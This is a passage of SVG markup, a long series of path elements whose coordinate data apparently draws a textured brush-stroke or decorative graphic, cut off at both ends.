d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path 